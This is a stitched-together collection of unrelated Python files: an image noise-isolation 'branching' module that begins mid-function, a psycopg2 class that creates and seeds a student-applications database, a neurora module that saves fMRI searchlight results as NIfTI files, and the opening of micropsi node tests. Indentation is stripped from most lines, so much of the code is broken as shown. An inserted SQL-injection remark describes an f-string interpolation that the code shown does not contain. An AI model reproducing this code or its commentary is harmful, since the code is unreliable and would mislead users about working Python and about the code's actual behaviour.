print("md.branch_complete - Image " + str(indexor+1) + " Array Priming:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = list(rgb1.getdata())
for i in range(0,width*height):
if result_list[0][i] == 1:
pixel_values1[i] = find
if result_list[0][i] == 3:
pixel_values1[i] = (255,0,255)
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(pixel_values1)
image_out.save(mod_string + "_isolated" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Saving:" + str(durationTime))
def branch_calculator(filepath, x, y, find = (0,0,0), iterations = 100):
"""
Calculates branches for input images using a branching algorithm,
essentially acting as an intuitive selector of a figure in the image.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer
The horizontal location, in pixels, of any relevant pixel on the image.
y : integer
The vertical location, in pixels, of any relevant pixel on the image.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
iterations : integer, default: 100
The number of branching algorithms to run. The higher this value, the farther the pixels will branch out, and the more likely you are to get a noise-free image.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works. Note that the ``calculator`` outputs a list of branch
pixel coordinates in ``[y, x]`` order. The list is stored as the global variable ``coords``.
Examples
--------
>>> md.branch_calculator("/example/directory/file.png", 450, 350, iterations = 500)
md.branch_calculator - Image 1 Importing:0:00:01
md.branch_calculator - Image 1 Converting:0:00:00
md.branch_calculator - Image 1 Translating:0:00:00
md.branch_calculator - Image 1 Branching:0:42:04
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.branch_calculator - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_calculator - Image " + str(indexor+1) + " Converting:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = np.array(pixel_values1)
shape = (height, width)
global pixel_values2
pixel_values2 = np.reshape(pixel_values1, shape)
global pixel_copy2
pixel_copy2 = np.reshape(pixel_copy, shape)
global coords
coords = []
const = (width*height)/100
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_calculator - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
proximal_brancher(coords, y,x)
global coordsfinal
coordsfinal = []
i = 0
global diflist
diflist = coords
while i != iterations:
coordsfinalinit = []
filteredcoords = []
print(str(round((i*100)/(iterations),1)) + "%", end = "\r")
for index, item in enumerate(diflist):
txt = str(diflist[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
if manual_checker(newy, newx) == 2:
proximal_brancher(coordsfinal, newy, newx)
for index, item in enumerate(coordsfinal):
coordsfinal[index] = str(coordsfinal[index])
for index, item in enumerate(coords):
coords[index] = str(coords[index])
diflist = list(set(coordsfinal) - set(coords))
coords = list(coordsfinal)
i += 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_calculator - Image " + str(indexor+1) + " Branching:" + str(durationTime))
def branch_analyzer(calc):
"""
Analyzes branches for input images,
essentially determining the clinical significance of each spot,
preparing the image for isolation.
Parameters
----------
calc : list
A list of tuples containing the coordinates of all branched pixels.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works. Note that the ``analyzer`` outputs a list of confirmed branch
pixel coordinates in ``[y, x]`` order. The list is stored as the global variable ``g``.
Examples
--------
>>> md.branch_analyzer(coords)
md.branch_analyzer - Branch Analyzing:0:03:02
"""
startTime = datetime.datetime.now().replace(microsecond=0)
global g
g = []
a = list(set(calc))
for index, item in enumerate(a):
print(str(round((index*100)/(len(a)),1)) + "%", end = "\r")
txt = str(a[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
if manual_checker(newy, newx) == 2:
g.append([newy, newx])
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_analyzer - Branch Analyzing:" + str(durationTime))
def branch_isolator(filepath, calc, find = (0,0,0)):
"""
Isolates the analyzed branches in inputted images,
silencing every pixel that does not belong to a clinically significant branch.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
calc : list
A list of tuples containing the coordinates of all branched pixels.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works.
Examples
--------
>>> md.branch_isolator("/example/directory/file.png", g)
md.branch_isolator - Image 1 Branch Isolating:0:00:10
md.branch_isolator - Image 1 Array Priming:0:00:00
md.branch_isolator - Image 1 Translating:0:00:00
md.branch_isolator - Image 1 Saving:0:00:01
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy2 = pixel_values2.copy()  # work on a copy of the global label array so the original labels survive
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.branch_isolator - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
complement = []
for w in range(width):
for h in range(height):
complement.append([h,w])
setc = {tuple(item) for item in calc}
finalset = [item for item in complement if tuple(item) not in setc]
for index, item in enumerate(finalset):
txt = str(finalset[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
pixel_copy2[newy,newx] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_isolator - Image " + str(indexor+1) + " Branch Isolating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
result = pixel_copy2.reshape([1, width*height])
result = result.tolist()
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_isolator - Image " + str(indexor+1) + " Array Priming:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = list(rgb1.getdata())
for i in range(0,width*height):
if result[0][i] == 1:
pixel_values1[i] = find
if result[0][i] == 3:
pixel_values1[i] = (255,0,255)
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_isolator - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(pixel_values1)
image_out.save(mod_string + "_isolated" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_isolator - Image " + str(indexor+1) + " Saving:" + str(durationTime))
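``branch_isolator`` silences everything outside the branch set by building the complement of ``calc`` over all ``[h, w]`` pixel coordinates. The set-difference step in isolation (hypothetical helper, same loop order as the function above):

```python
def non_branch_pixels(width, height, calc):
    # All [h, w] coordinates of the image that are *not* branch pixels,
    # mirroring the complement/set-difference step in branch_isolator.
    branch_set = {tuple(c) for c in calc}
    return [[h, w] for w in range(width) for h in range(height)
            if (h, w) not in branch_set]
```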
def proximal_brancher(calc, y, x):
# appends the in-bounds 8-neighbourhood of (y, x), plus (y, x) itself, to calc
d = calc
r = y
c = x
m, n = pixel_values2.shape
for i in [-1, 0, 1]:
for j in [-1, 0, 1]:
if 0 <= r + i < m and 0 <= c + j < n:
d.append([r + i, c + j])
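``proximal_brancher`` appends the centre pixel and its up-to-eight in-bounds neighbours. The same clipped neighbourhood as a standalone sketch (hypothetical helper name):

```python
def neighborhood(y, x, m, n):
    # The clipped 8-neighbourhood (plus the centre pixel) of (y, x)
    # for an m x n image, matching proximal_brancher's bounds check.
    return [[y + i, x + j]
            for i in (-1, 0, 1) for j in (-1, 0, 1)
            if 0 <= y + i < m and 0 <= x + j < n]
```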
def manual_checker(y, x):
if pixel_values2[y,x] == 2:
return 2
else:
return 1
# gsas_web/project/db/access_database.py (repo: MohammedAlaaNassar/Mayan-EDMS-GSAS, Apache-2.0)
from typing import Dict, List, Union
import psycopg2
from project.db.config_database import ConfigDatabase
class AccessDataBase(ConfigDatabase):
def __init__(self) -> None:
self.logger.debug('Init Class AccessDataBase')
conn = psycopg2.connect(**self.postgres_access)
cursor = conn.cursor()
query = f'''CREATE TABLE IF NOT EXISTS {self.table_name}(
message_id SERIAL PRIMARY KEY NOT NULL,
message_title varchar(30) NOT NULL UNIQUE,
author_name varchar(30) NOT NULL,
message_text varchar(200) NOT NULL,
creation_date date NOT NULL)'''
cursor.execute(query)
cursor.close()
conn.commit()
cursor = conn.cursor()
query = f'''CREATE TABLE IF NOT EXISTS {self.applicants_table}(
applicant_id SERIAL PRIMARY KEY NOT NULL,
name varchar(100) NOT NULL,
email varchar(50) NOT NULL,
university varchar(100) NOT NULL,
faculty varchar(100) NOT NULL,
department varchar(100) NOT NULL,
graduation_year int NOT NULL,
gpa varchar(100) NOT NULL,
doc_birthdate text NULL,
doc_bsc_cert text NULL,
doc_r_letters text NULL,
status int NOT NULL,
program_id int NOT NULL,
creation_date date NOT NULL)'''
cursor.execute(query)
cursor.close()
conn.commit()
cursor = conn.cursor()
query = f'''CREATE TABLE IF NOT EXISTS {self.programs_table}(
program_id SERIAL PRIMARY KEY NOT NULL,
name varchar(100) NOT NULL,
creation_date date NOT NULL)'''
cursor.execute(query)
cursor.close()
conn.commit()
cursor = conn.cursor()
query = f'''CREATE TABLE IF NOT EXISTS {self.reviewers_table}(
reviewer_id SERIAL PRIMARY KEY NOT NULL,
name varchar(100) NOT NULL,
creation_date date NOT NULL)'''
cursor.execute(query)
cursor.close()
conn.commit()
cursor = conn.cursor()
query = f'''CREATE TABLE IF NOT EXISTS {self.scores_table}(
id SERIAL PRIMARY KEY NOT NULL,
reviewer_id int NOT NULL,
applicant_id int NOT NULL,
score int NOT NULL,
creation_date date NOT NULL)'''
cursor.execute(query)
cursor.close()
conn.commit()
self.logger.debug('CLASS AccessDataBase INITIATED')
def init_data(self):
conn = psycopg2.connect(**self.postgres_access)
cursor = conn.cursor()
query = f'''INSERT INTO {self.programs_table} (name, creation_date) VALUES (%s, %s)'''
programs = ['College of engineering, Computer Dept.', 'College of engineering, Electronics Dept.', 'College of engineering, Industrial Dept.']
cursor.executemany(query, [(name, '2000-12-16 12:21:13') for name in programs])
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.reviewers_table} (name, creation_date) VALUES (%s, %s)'''
cursor.executemany(query, [(name, '2000-12-16 12:21:13') for name in ('A', 'B', 'C', 'D')])
cursor.close()
# the twelve demo applicants cycle through three (university, department, year, gpa, program, date) profiles
universities = ['Alexandria University', 'AASTMT', 'Ain Shams University']
departments = ['Computer Dept', 'Electronics Dept', 'Mechanics Dept']
graduation_years = [2019, 2020, 2021]
gpas = ['3.5', '3.5', '3.9']
program_ids = [1, 3, 2]
creation_dates = ['2021-12-16 12:21:13', '2021-10-16 12:21:13', '2021-11-16 12:21:13']
applicants = []
for i in range(1, 13):
    j = (i - 1) % 3
    applicants.append((f'Student {i}', f's{i}@gmail.com', universities[j], 'College of engineering',
                       departments[j], graduation_years[j], gpas[j], 'a', 'a', 'a', 0,
                       program_ids[j], creation_dates[j]))
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status, program_id, creation_date) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'''
cursor.executemany(query, applicants)
cursor.close()
conn.commit()
self.logger.debug('data initiated')
def get_applicants(self):
self.logger.debug('GETTING APPLICANTS')
conn = psycopg2.connect(**self.postgres_access)
self.logger.debug('DB CONNECTED')
cursor = conn.cursor()
select_query = f"select a.*, p.name as program_name from {self.applicants_table} a, {self.programs_table} p where p.program_id = a.program_id"
cursor.execute(select_query)
self.logger.debug('QUERY EXECUTED')
applicants = cursor.fetchall()
cursor.close()
conn.commit()
self.logger.debug('RETURNING APPLICANTS')
return applicants
def get_applicant_byId(self, applicant_id):
self.logger.debug('GETTING APPLICANT BY ID')
conn = psycopg2.connect(**self.postgres_access)
self.logger.debug('DB CONNECTED')
cursor = conn.cursor()
select_query = f"select a.*, p.name as program_name from {self.applicants_table} a, {self.programs_table} p where p.program_id = a.program_id and a.applicant_id = %s"
cursor.execute(select_query, (applicant_id,))
self.logger.debug('QUERY EXECUTED')
applicant = cursor.fetchone()
cursor.close()
conn.commit()
self.logger.debug('RETURNING APPLICANT ID ')
return applicant
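Interpolating a value such as ``applicant_id`` straight into the SQL f-string invites SQL injection; with psycopg2 the value can instead be bound as a ``%s`` parameter so the driver escapes it (table names still have to be interpolated, since identifiers cannot be bound). A sketch with a hypothetical helper that only builds the query and its parameter tuple:

```python
def applicant_by_id_query(applicants_table, programs_table, applicant_id):
    # Build the same lookup as get_applicant_byId, but with the id as a
    # bound %s parameter instead of an f-string interpolation.
    query = (f"select a.*, p.name as program_name "
             f"from {applicants_table} a, {programs_table} p "
             f"where p.program_id = a.program_id and a.applicant_id = %s")
    return query, (applicant_id,)
```

``cursor.execute(query, params)`` would then run the lookup safely.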
# neurora/nii_save.py (repo: neurora/neurora.io, MIT)
# -*- coding: utf-8 -*-
' a module for saving the RSA results in a .nii file for fMRI '
__author__ = 'Zitong Lu'
import numpy as np
import nibabel as nib
from nilearn.image import smooth_img
import math
from scipy.stats import t
from neurora.stuff import fwe_correct, fdr_correct, cluster_fwe_correct, cluster_fdr_correct, get_HOcort, get_bg_ch2bet,\
mask_to
from neurora.rsa_plot import plot_brainrsa_rlts
' a function for saving the searchlight correlation coefficients as a NIfTI file for fMRI '
def corr_save_nii(corrs, affine, filename=None, corr_mask=get_HOcort(), size=[60, 60, 60], ksize=[3, 3, 3], strides=[1, 1, 1], p=1, r=0, correct_method=None, clusterp=0.05, smooth=True, plotrlt=True, img_background=None):
"""
Save the searchlight correlation coefficients as a NIfTI file for fMRI
Parameters
----------
corrs : array
The similarities between behavioral data and fMRI data for searchlight.
The shape of RDMs is [n_x, n_y, n_z, 2]. n_x, n_y, n_z represent the number of calculation units for searchlight
along the x, y, z axis and 2 represents a r-value and a p-value.
affine : array or list
The position information of the fMRI-image array data in a reference space.
filename : string. Default is None - 'rsa_result.nii'.
The file path+filename for the result .nii file.
If the filename does not end in ".nii", it will be filled in automatically.
corr_mask : string. Default is get_HOcort().
The filename of a mask data for correcting the RSA result.
It can just be one of your fMRI data files in your experiment for a mask file for ROI. If the corr_mask is a
filename of a ROI mask file, only the RSA results in ROI will be visible.
size : array or list [nx, ny, nz]. Default is [60, 60, 60].
The size of the fMRI-img in your experiments.
ksize : array or list [kx, ky, kz]. Default is [3, 3, 3].
The size of the calculation unit for searchlight.
kx, ky, kz represent the number of voxels along the x, y, z axis.
strides : array or list [sx, sy, sz]. Default is [1, 1, 1].
The strides for calculating along the x, y, z axis.
p : float. Default is 1.
The threshold of p-values.
Only the results those p-values are lower than this value will be visible.
r : float. Default is 0.
The threshold of r-values.
Only the results those r-values are higher than this value will be visible.
correct_method : None or string 'FWE' or 'FDR'. Default is None.
The method for correcting the RSA results.
If correct_method='FWE', here the FWE-correction will be used. If correct_methd='FDR', here the FDR-correction
will be used. If correct_method=None, no correction.
Only when p<1, correct_method works.
clusterp : float. Default is 0.05.
The threshold of p-value for cluster-wise correction.
Only when correct_method='Cluster-FDR' or 'Cluster-FWE', clusterp works.
smooth : bool True or False. Default is True.
Smooth the RSA result or not.
plotrlt : bool True or False.
Plot the RSA result automatically or not.
img_background : None or string. Default if None.
The filename of a background image that the RSA results will be plotted on the top of it.
If img_background=None, the background will be ch2.nii.gz.
Only when plotrlt=True, img_background works.
Returns
-------
img : array
The array of the correlation coefficients map.
The shape is [nx, ny, nz]. nx, ny, nz represent the size of the fMRI-img.
Notes
-----
A result .nii file of searchlight correlation coefficients will be generated at the corresponding address of filename.
"""
if len(np.shape(corrs)) != 4 or len(np.shape(affine)) != 2 or np.shape(affine)[0] != 4 or np.shape(affine)[1] != 4:
return "Invalid input!"
# get the size of the fMRI-img
nx = size[0]
ny = size[1]
nz = size[2]
# the size of the calculation units for searchlight
kx = ksize[0]
ky = ksize[1]
kz = ksize[2]
rx = int((kx-1)/2)
ry = int((ky-1)/2)
rz = int((kz-1)/2)
# strides for calculating along the x, y, z axis
sx = strides[0]
sy = strides[1]
sz = strides[2]
# calculate the number of the calculation units in the x, y, z directions
n_x = np.shape(corrs)[0]
n_y = np.shape(corrs)[1]
n_z = np.shape(corrs)[2]
corrsr = corrs[:, :, :, 0]
# initialize the img array to save the sum-r-value for each voxel
img_nii = np.zeros([nx, ny, nz], dtype=np.float64)
# initialize a mask in order to record valid voxels (have qualified results)
mask = np.zeros([nx, ny, nz], dtype=int)
# get the p-values
corrsp = corrs[:, :, :, 1]
# do the correction
if p < 1:
# FDR-correction
if correct_method == "FDR":
corrsp = fdr_correct(corrsp, p_threshold=p)
# FWE-correction
if correct_method == "FWE":
corrsp = fwe_correct(corrsp, p_threshold=p)
# iterate through all the calculation units again
# record the valid voxels
# [n_x, n_y, n_z] expanses into [nx, ny, nz] based on ksize & strides
for i in range(n_x):
for j in range(n_y):
for k in range(n_z):
x = i * sx
y = j * sy
z = k * sz
# p-values<threshold-p & r-values>threshold-r
if (corrsp[i, j, k] < p) and (corrsr[i, j, k] > r):
mask[x + rx, y + ry, z + rz] = 1
if (math.isnan(corrsr[i, j, k]) == False):
img_nii[x+rx, y+ry, z+rz] = img_nii[x+rx, y+ry, z+rz] + corrsr[i, j, k]
# initialize the newimg array to calculate the avg-r-value for each voxel
newimg_nii = np.full([nx, ny, nz], np.nan)
# calculate the avg values of each valid voxel
for i in range(nx):
for j in range(ny):
for k in range(nz):
# valid voxel
if mask[i, j, k] == 1:
# sum-r-value/index
newimg_nii[i, j, k] = img_nii[i, j, k]
# set filename for result .nii file
if filename is None:
filename = "rsa_result.nii"
elif not filename.endswith(".nii"):
filename = filename + ".nii"
# corr_mask != None
# use the mask file to correct RSA results
# in order to avoid results showing outside of the brain
if corr_mask == get_HOcort():
mask_to(get_bg_ch2bet(), size, affine, filename=filename)
mask = nib.load(filename).get_fdata()
else:
# load the array data of the mask file
mask = nib.load(corr_mask).get_fdata()
# do correction by the mask
if corr_mask != None:
for i in range(nx):
for j in range(ny):
for k in range(nz):
if (math.isnan(mask[i, j, k]) is True) or mask[i, j, k] == 0:
newimg_nii[i, j, k] = np.nan
print(filename)
print("Save RSA results.")
# save the .nii file for RSA results
file = nib.Nifti1Image(newimg_nii, affine)
if smooth == True:
# smooth the img data of the .nii file
file = smooth_img(file, fwhm='fast')
# save the result
nib.save(file, filename)
# determine if it has results
norlt = np.isnan(newimg_nii).all()
if norlt == True:
print("No RSA results.")
print("File("+filename+") saves successfully!")
# determine plot the results or not
if norlt == False and plotrlt == True:
print("Plot RSA results.")
plot_brainrsa_rlts(filename, background=img_background, type='r')
return newimg_nii
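``corr_save_nii`` places each calculation unit's value at the voxel ``x = i * sx + rx`` (and likewise along y and z), where the radius ``r`` is half the kernel size. That index mapping in isolation (hypothetical helper, defaults matching the function signature above):

```python
def unit_to_voxel(i, j, k, ksize=(3, 3, 3), strides=(1, 1, 1)):
    # Map a searchlight calculation-unit index (i, j, k) to the voxel at
    # the centre of that unit: position = index * stride + (ksize - 1) // 2.
    radii = [(ks - 1) // 2 for ks in ksize]
    return (i * strides[0] + radii[0],
            j * strides[1] + radii[1],
            k * strides[2] + radii[2])
```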
' a function for saving the searchlight statistical results as a NIfTI file for fMRI '
def stats_save_nii(corrs, affine, filename=None, corr_mask=get_HOcort(), size=[60, 60, 60], ksize=[3, 3, 3], strides=[1, 1, 1], p=0.05, df=20, correct_method=None, clusterp=0.05, smooth=False, plotrlt=True, img_background=None):
"""
Save the searchlight RSA statistical results as a NIfTI file for fMRI
Parameters
----------
corrs : array
The statistical results between behavioral data and fMRI data for searchlight.
The shape of RDMs is [n_x, n_y, n_z, 2]. n_x, n_y, n_z represent the number of calculation units for searchlight
along the x, y, z axis and 2 represents a t-value and a p-value.
affine : array or list
The position information of the fMRI-image array data in a reference space.
filename : string. Default is None - 'rsa_result.nii'.
The file path+filename for the result .nii file.
If the filename does not end in ".nii", it will be filled in automatically.
corr_mask : string. Default is get_HOcort().
The filename of a mask data for correcting the RSA result.
It can just be one of your fMRI data files in your experiment for a mask file for ROI. If the corr_mask is a
filename of a ROI mask file, only the RSA results in ROI will be visible.
size : array or list [nx, ny, nz]. Default is [60, 60, 60].
The size of the fMRI-img in your experiments.
ksize : array or list [kx, ky, kz]. Default is [3, 3, 3].
The size of the calculation unit for searchlight.
kx, ky, kz represent the number of voxels along the x, y, z axis.
strides : array or list [sx, sy, sz]. Default is [1, 1, 1].
The strides for calculating along the x, y, z axis.
p : float. Default is 0.05.
The threshold of p-values.
Only the results those p-values are lower than this value will be visible.
df : int. Default is 20.
The degree of freedom.
correct_method : None or string 'FWE' or 'FDR' or 'Cluster-FWE' or 'Cluster-FDR'. Default is None.
The method for correcting the RSA results.
If correct_method='FWE', here the FWE-correction will be used. If correct_methd='FDR', here the FDR-correction
will be used. If correct_method='Cluster-FWE', here the Cluster-wise FWE-correction will be used. If
correct_methd='Cluster-FDR', here the Cluster-wise FDR-correction will be used. If correct_method=None, no
correction.
Only when p<1, correct_method works.
clusterp : float. Default is 0.05.
The threshold of p-value for cluster-wise correction.
Only when correct_method='Cluster-FDR' or 'Cluster-FWE', clusterp works.
smooth : bool True or False. Default is False.
Smooth the RSA result or not.
plotrlt : bool True or False. Default is True.
Plot the RSA result automatically or not.
img_background : None or string. Default if None.
The filename of a background image that the RSA results will be plotted on the top of it.
If img_background=None, the background will be ch2.nii.gz.
Only when plotrlt=True, img_background works.
Returns
-------
img : array
The array of the statistical results t-values map.
The shape is [nx, ny, nz]. nx, ny, nz represent the size of the fMRI-img.
Notes
-----
A result .nii file of searchlight statistical results will be generated at the corresponding address of filename.
"""
if len(np.shape(corrs)) != 4 or len(np.shape(affine)) != 2 or np.shape(affine)[0] != 4 or np.shape(affine)[1] != 4:
return "Invalid input!"
# get the size of the fMRI-img
nx = size[0]
ny = size[1]
nz = size[2]
# the size of the calculation units for searchlight
kx = ksize[0]
ky = ksize[1]
kz = ksize[2]
rx = int((kx-1)/2)
ry = int((ky-1)/2)
rz = int((kz-1)/2)
# strides for calculating along the x, y, z axis
sx = strides[0]
sy = strides[1]
sz = strides[2]
# calculate the number of the calculation units in the x, y, z directions
n_x = np.shape(corrs)[0]
n_y = np.shape(corrs)[1]
n_z = np.shape(corrs)[2]
img_nii = np.zeros([nx, ny, nz], dtype=np.float64)
# initialize a mask in order to record valid voxels (have qualified results)
mask = np.zeros([nx, ny, nz], dtype=int)
# get the p-values
corrsp = corrs[:, :, :, 1]
corrst = corrs[:, :, :, 0]
# calculate the number of voxels for correction
fadeimg = np.zeros([nx, ny, nz], dtype=int)
# iterate through all the calculation units
# calculate the indexs
for i in range(n_x):
for j in range(n_y):
for k in range(n_z):
x = i*sx
y = j*sy
z = k*sz
if corrsp[i, j, k] < 1:
img_nii[x + rx, y + ry, z + rz] = corrst[i, j, k]
if corrsp[i, j, k] < p:
fadeimg[x + rx, y + ry, z + rz] = 1
n_corrected = int(fadeimg.sum())
print(str(n_corrected)+" voxels will be corrected.")
# do the correction
if p < 1:
# FDR-correction
if correct_method == "FDR":
corrsp = fdr_correct(corrsp, p_threshold=p)
# FWE-correction
if correct_method == "FWE":
corrsp = fwe_correct(corrsp, p_threshold=p)
# Cluster-wise FDR-correction
if correct_method == "Cluster-FDR":
corrsp = cluster_fdr_correct(corrsp, p_threshold1=p, p_threshold2=clusterp)
# Cluster-wise FWE-correction
if correct_method == "Cluster-FWE":
corrsp = cluster_fwe_correct(corrsp, p_threshold1=p, p_threshold2=clusterp)
# iterate through all the calculation units again
print("Record the valid voxels.")
for i in range(n_x):
for j in range(n_y):
for k in range(n_z):
x = i * sx
y = j * sy
z = k * sz
if corrsp[i, j, k] < p:
mask[x + rx, y + ry, z + rz] = 1
# initialize the newimg array to calculate the avg-r-value for each voxel
newimg_nii = np.full([nx, ny, nz], np.nan)
t_threshold = t.isf(p, df)
print("t threshold: " + str(t_threshold))
# set filename for result .nii file
if filename is None:
filename = "rsa_result.nii"
elif not filename.endswith(".nii"):
filename = filename + ".nii"
# corr_mask != None
# use the mask file to correct RSA results
# in order to avoid results showing outside of the brain
if corr_mask == get_HOcort():
mask_to(get_bg_ch2bet(), size, affine, filename)
cmask = nib.load(filename).get_fdata()
else:
# load the array data of the mask file
cmask = nib.load(corr_mask).get_fdata()
# calculate the avg values of each valid voxel
for i in range(nx):
for j in range(ny):
for k in range(nz):
# valid voxel
if (math.isnan(cmask[i, j, k]) == False) and cmask[i, j, k] != 0 and mask[i, j, k] == 1:
# sum-r-value/index
newimg_nii[i, j, k] = img_nii[i, j, k]
if newimg_nii[i, j, k] < t_threshold:
newimg_nii[i, j, k] = np.nan
print("Get RSA results.")
print(filename)
print("Save RSA results.")
# save the .nii file for RSA results
file = nib.Nifti1Image(newimg_nii, affine)
if smooth == True:
print("Smooth the results.")
# smooth the img data of the .nii file
file = smooth_img(file, fwhm='fast')
# save the result
nib.save(file, filename)
# determine if it has results
norlt = np.isnan(newimg_nii).all()
if norlt == True:
print("No RSA results.")
print("File("+filename+") saves successfully!")
# determine plot the results or not
if norlt == False and plotrlt == True:
print("Plot RSA results.")
plot_brainrsa_rlts(filename, background=img_background, type='t')
return newimg_nii
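``stats_save_nii`` thresholds t-values at ``t.isf(p, df)``: the one-sided critical value whose upper-tail probability equals ``p`` at ``df`` degrees of freedom. For example, ``p=0.05`` with ``df=20`` gives roughly 1.725:

```python
from scipy.stats import t

def one_sided_t_threshold(p, df):
    # Same threshold stats_save_nii computes: the t-value whose
    # upper-tail (survival-function) probability equals p.
    return t.isf(p, df)
```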
"""from neurora.stuff import get_affine
affine = get_affine("/Users/zitonglu/Downloads/isc_results_p0.001_fdr1.nii")
import h5py
stats = np.array(h5py.File("/Users/zitonglu/Downloads/All_tom.h5", "r")["stats"])
stats_save_nii(stats, affine, filename="all_0.05", corr_mask=get_HOcort(), size=[79, 95, 68], ksize=[3, 3, 3], strides=[1, 1, 1], p=0.05, df=23, correct_method="Cluster-FDR", clusterp=0.05, smooth=False, plotrlt=True, img_background=None)"""
#!/usr/local/bin/python
# micropsi_core/tests/test_node_pipe_logic.py (repo: brucepro/micropsi2, Apache-2.0)
# -*- coding: utf-8 -*-
"""
Tests for node activation propagation and gate arithmetic
"""
from micropsi_core import runtime as micropsi


def prepare(fixed_nodenet):
    nodenet = micropsi.get_nodenet(fixed_nodenet)
    netapi = nodenet.netapi
    netapi.delete_node(netapi.get_node("ACTA"))
    netapi.delete_node(netapi.get_node("ACTB"))
    source = netapi.create_node("Register", "Root", "Source")
    netapi.link(source, "gen", source, "gen")
    source.activation = 1
    nodenet.step()
    return nodenet, netapi, source


def add_directional_activators(fixed_nodenet):
    net = micropsi.get_nodenet(fixed_nodenet)
    netapi = net.netapi
    sub_act = netapi.create_node("Activator", "Root", "sub-activator")
    net.get_node(sub_act.uid).set_parameter("type", "sub")
    sur_act = netapi.create_node("Activator", "Root", "sur-activator")
    net.get_node(sur_act.uid).set_parameter("type", "sur")
    por_act = netapi.create_node("Activator", "Root", "por-activator")
    net.get_node(por_act.uid).set_parameter("type", "por")
    ret_act = netapi.create_node("Activator", "Root", "ret-activator")
    net.get_node(ret_act.uid).set_parameter("type", "ret")
    cat_act = netapi.create_node("Activator", "Root", "cat-activator")
    net.get_node(cat_act.uid).set_parameter("type", "cat")
    exp_act = netapi.create_node("Activator", "Root", "exp-activator")
    net.get_node(exp_act.uid).set_parameter("type", "exp")
    return sub_act, sur_act, por_act, ret_act, cat_act, exp_act


def test_node_pipe_logic_subtrigger(fixed_nodenet):
    # test a resting classifier, expect sub to be activated
    net, netapi, source = prepare(fixed_nodenet)
    n_head = netapi.create_node("Pipe", "Root", "Head")
    netapi.link(source, "gen", n_head, "sub", 1)
    net.step()
    assert n_head.get_gate("sub").activation == 1


def test_node_pipe_logic_classifier_two_off(fixed_nodenet):
    # test a resting classifier, expect no activation
    net, netapi, source = prepare(fixed_nodenet)
    n_head = netapi.create_node("Pipe", "Root", "Head")
    n_a = netapi.create_node("Pipe", "Root", "A")
    n_b = netapi.create_node("Pipe", "Root", "B")
    netapi.link_with_reciprocal(n_head, n_a, "subsur")
    netapi.link_with_reciprocal(n_head, n_b, "subsur")
    for i in range(1, 3):
        net.step()
    assert n_head.get_gate("gen").activation == 0


